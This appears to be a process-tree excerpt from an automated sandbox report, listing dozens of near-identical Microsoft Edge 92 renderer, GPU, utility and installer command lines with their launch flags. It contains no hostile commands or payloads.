C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff735615460,0x7ff735615470,0x7ff7356154806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6120 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8544 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9208 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9396 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10480 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9836 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10084 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10188 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9140 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8624 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10784 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11252 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11112 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11244 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10672 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10700 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8836 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8212 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10632 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10576 /prefetch:15⤵
-
